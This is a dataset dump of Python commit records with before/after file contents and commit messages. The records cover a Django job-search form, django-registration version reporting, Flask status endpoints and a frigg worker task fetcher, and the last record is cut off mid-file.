commit
stringlengths 40
40
| old_file
stringlengths 4
118
| new_file
stringlengths 4
118
| old_contents
stringlengths 0
2.94k
| new_contents
stringlengths 1
4.43k
| subject
stringlengths 15
444
| message
stringlengths 16
3.45k
| lang
stringclasses 1
value | license
stringclasses 13
values | repos
stringlengths 5
43.2k
| prompt
stringlengths 17
4.58k
| response
stringlengths 1
4.43k
| prompt_tagged
stringlengths 58
4.62k
| response_tagged
stringlengths 1
4.43k
| text
stringlengths 132
7.29k
| text_tagged
stringlengths 173
7.33k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
968c73805e5beff502955ad3dbb8aa86ee8bc0b7
|
freelancefinder/jobs/forms.py
|
freelancefinder/jobs/forms.py
|
"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all())
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
|
"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all(), required=False)
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
|
Tag is not required, of course
|
Tag is not required, of course
|
Python
|
bsd-3-clause
|
ScorpionResponse/freelancefinder,ScorpionResponse/freelancefinder,ScorpionResponse/freelancefinder
|
"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all())
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
Tag is not required, of course
|
"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all(), required=False)
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
|
<commit_before>"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all())
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
<commit_msg>Tag is not required, of course<commit_after>
|
"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all(), required=False)
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
|
"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all())
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
Tag is not required, of course"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all(), required=False)
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
|
<commit_before>"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all())
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
<commit_msg>Tag is not required, of course<commit_after>"""Forms for dealing with jobs/posts."""
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag
class PostFilterForm(forms.Form):
"""Form for filtering the PostListView."""
title = forms.CharField(required=False)
is_job_posting = forms.BooleanField(required=False)
is_freelance = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(PostFilterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Filter'))
class JobSearchForm(forms.Form):
"""Form for filtering the JobListView."""
search = forms.CharField(required=False)
tag = forms.ModelChoiceField(queryset=Tag.objects.all(), required=False)
def __init__(self, *args, **kwargs):
super(JobSearchForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_class = 'form-inline'
self.helper.form_method = 'get'
self.helper.add_input(Submit('submit', 'Search'))
|
99b96d2c0b82e186b9eaa13d2efe8b617c9cf3aa
|
registration/__init__.py
|
registration/__init__.py
|
VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
|
VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
|
Fix version number reporting so we can be installed before Django.
|
Fix version number reporting so we can be installed before Django.
|
Python
|
bsd-3-clause
|
dinie/django-registration,dinie/django-registration,FundedByMe/django-registration,FundedByMe/django-registration,Avenza/django-registration
|
VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
Fix version number reporting so we can be installed before Django.
|
VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
|
<commit_before>VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
<commit_msg>Fix version number reporting so we can be installed before Django.<commit_after>
|
VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
|
VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
Fix version number reporting so we can be installed before Django.VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
|
<commit_before>VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
<commit_msg>Fix version number reporting so we can be installed before Django.<commit_after>VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
|
7d88c98fcf6984b07a8b085f8272868b1c23b29e
|
app/status/views.py
|
app/status/views.py
|
from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status=db_status
), 500
|
from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status={
'status_code': 500,
'message': db_status['message'][0]
}
), 500
|
Return correct message if elasticsearch fails to connect.
|
Return correct message if elasticsearch fails to connect.
|
Python
|
mit
|
alphagov/digitalmarketplace-search-api,alphagov/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api
|
from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status=db_status
), 500
Return correct message if elasticsearch fails to connect.
|
from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status={
'status_code': 500,
'message': db_status['message'][0]
}
), 500
|
<commit_before>from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status=db_status
), 500
<commit_msg>Return correct message if elasticsearch fails to connect.<commit_after>
|
from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status={
'status_code': 500,
'message': db_status['message'][0]
}
), 500
|
from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status=db_status
), 500
Return correct message if elasticsearch fails to connect.from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status={
'status_code': 500,
'message': db_status['message'][0]
}
), 500
|
<commit_before>from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status=db_status
), 500
<commit_msg>Return correct message if elasticsearch fails to connect.<commit_after>from flask import jsonify, current_app
from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes
@status.route('/_status')
def status():
db_status = status_for_all_indexes()
if db_status['status_code'] == 200:
return jsonify(
status="ok",
version=utils.get_version_label(),
db_status=db_status
)
current_app.logger.exception("Error connecting to elasticsearch")
return jsonify(
status="error",
version=utils.get_version_label(),
message="Error connecting to elasticsearch",
db_status={
'status_code': 500,
'message': db_status['message'][0]
}
), 500
|
155476e8feb584fb802b2aed4266aec32d617f2a
|
app/status/views.py
|
app/status/views.py
|
from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_wot_got_errors = []
if api_response is None or api_response.status_code is not 200:
apis_wot_got_errors.append("(Data) API")
# if no errors found, return everything
if not apis_wot_got_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_wot_got_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
|
from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_with_errors = []
if api_response is None or api_response.status_code != 200:
apis_with_errors.append("(Data) API")
# if no errors found, return everything
if not apis_with_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_with_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
|
Change variable name & int comparison.
|
Change variable name & int comparison.
|
Python
|
mit
|
alphagov/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,alphagov/digitalmarketplace-supplier-frontend,alphagov/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,alphagov/digitalmarketplace-supplier-frontend
|
from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_wot_got_errors = []
if api_response is None or api_response.status_code is not 200:
apis_wot_got_errors.append("(Data) API")
# if no errors found, return everything
if not apis_wot_got_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_wot_got_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
Change variable name & int comparison.
|
from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_with_errors = []
if api_response is None or api_response.status_code != 200:
apis_with_errors.append("(Data) API")
# if no errors found, return everything
if not apis_with_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_with_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
|
<commit_before>from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_wot_got_errors = []
if api_response is None or api_response.status_code is not 200:
apis_wot_got_errors.append("(Data) API")
# if no errors found, return everything
if not apis_wot_got_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_wot_got_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
<commit_msg>Change variable name & int comparison.<commit_after>
|
from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_with_errors = []
if api_response is None or api_response.status_code != 200:
apis_with_errors.append("(Data) API")
# if no errors found, return everything
if not apis_with_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_with_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
|
from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_wot_got_errors = []
if api_response is None or api_response.status_code is not 200:
apis_wot_got_errors.append("(Data) API")
# if no errors found, return everything
if not apis_wot_got_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_wot_got_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
Change variable name & int comparison.from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_with_errors = []
if api_response is None or api_response.status_code != 200:
apis_with_errors.append("(Data) API")
# if no errors found, return everything
if not apis_with_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_with_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
|
<commit_before>from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_wot_got_errors = []
if api_response is None or api_response.status_code is not 200:
apis_wot_got_errors.append("(Data) API")
# if no errors found, return everything
if not apis_wot_got_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_wot_got_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
<commit_msg>Change variable name & int comparison.<commit_after>from flask import jsonify, current_app
from . import status
from . import utils
from .. import api_client
@status.route('/_status')
def status():
api_response = utils.return_response_from_api_status_call(
api_client.status
)
apis_with_errors = []
if api_response is None or api_response.status_code != 200:
apis_with_errors.append("(Data) API")
# if no errors found, return everything
if not apis_with_errors:
return jsonify(
status="ok",
version=utils.get_version_label(),
api_status=api_response.json(),
)
message = "Error connecting to the " \
+ (" and the ".join(apis_with_errors)) \
+ "."
current_app.logger.error(message)
return jsonify(
status="error",
version=utils.get_version_label(),
api_status=utils.return_json_or_none(api_response),
message=message,
), 500
|
829cccc630c26f2e9d89007c669308c6b1bb63cf
|
frigg/worker/fetcher.py
|
frigg/worker/fetcher.py
|
# -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
del build
|
# -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
for result in build.results:
del result
del build
|
Add deletion of result after build
|
Add deletion of result after build
|
Python
|
mit
|
frigg/frigg-worker
|
# -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
del build
Add deletion of result after build
|
# -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
for result in build.results:
del result
del build
|
<commit_before># -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
del build
<commit_msg>Add deletion of result after build<commit_after>
|
# -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
for result in build.results:
del result
del build
|
# -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
del build
Add deletion of result after build# -*- coding: utf8 -*-
import json
import threading
import time
import logging
